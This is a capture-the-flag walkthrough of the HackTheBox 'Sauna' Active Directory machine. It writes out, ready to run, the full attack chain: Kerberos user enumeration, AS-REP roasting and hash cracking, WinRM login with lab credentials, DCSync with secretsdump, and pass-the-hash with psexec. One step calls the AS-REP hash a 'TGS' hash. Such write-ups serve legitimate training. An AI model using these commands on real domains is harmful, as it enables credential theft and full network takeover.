Hello, fellow hackers! Today, we’re diving into a new HackTheBox machine which is focused on Active Directory testing. So, let’s get started without wasting any time!
Scanning
Let’s start scanning machine with nmap
nmap -p- -vvv -sV --script vuln 10.10.10.175Result
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=sauna.htb
| Found the following possible CSRF vulnerabilities:
|
| Path: http://sauna.htb:80/
| Form id: email
| Form action: #
|
| Path: http://sauna.htb:80/about.html
| Form id: email
| Form action: #
|
| Path: http://sauna.htb:80/index.html
| Form id: email
| Form action: #
|
| Path: http://sauna.htb:80/single.html
| Form id:
| Form action: #
|
| Path: http://sauna.htb:80/single.html
| Form id:
| Form action: #
|
| Path: http://sauna.htb:80/contact.html
| Form id:
|_ Form action: #
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-server-header: Microsoft-IIS/10.0
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-06-12 18:31:47Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
|_ssl-ccs-injection: No reply from server (TIMEOUT)
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49739/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49775/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPCwe got bunch of open ports
Accessing and Enumerating HTTP
i started enumerating port 80 which is running on IIS version 10.0
I tried reading source code, directory enumeration etc but found nothing interesting only inside about.html we found team name that we gonna use as username later.
let’s move on to other port i.e. samba, I tried Enumerating shares using smbmap but not working.
Here i move on to another port i.e. ldap and tried enumerating using ldapsearch but it did not providing anything useful.
Let’s move on to another port i.e. kerberos-sec
Kerberos Pentesting
* User Enumeration using kerbrute
- Here i am using team name we found on about.html page. For creating them as username i am using https://github.com/captain-noob/username-wordlist-generator script.
2. Finally i get output.txt which contain all variation of username. Then using kerbrute script
./kerbrute userenum -v --dc 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL output.txt -o valid_user.txt Result:
3. I tried checking FSmith user had pre authentication disabled or not if it’s diabled then we gonna get TGS Ticket Hash that we can use to login into FSmith user account.
impacket-GetNPUsers -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/FSmith -no-passResult:
4. Finally using john the ripper i crack this ticket hash.
Gaining Access
Using evil-winrm and found credentials i am able to gain FSmith user shell and found user.txt
evil-winrm -i 10.10.10.175 -u FSmith -p Thestrokes23Result:
Here i upload Winpeasx64.exe and using upload feature i upload this binary inside windows box
Let’s run this binary
in output we got autologon service user credentials.
I decide to use this credential and perform DCSync attack, For this i use secretsdump impacket script
impacket-secretsdump 'egotisticalbank.local/svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'Output:
We found administrator hash i tried loging in into administrator account using psexec impacket script
impacket-psexec administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98eOutput:
We successfully login and got root.txt
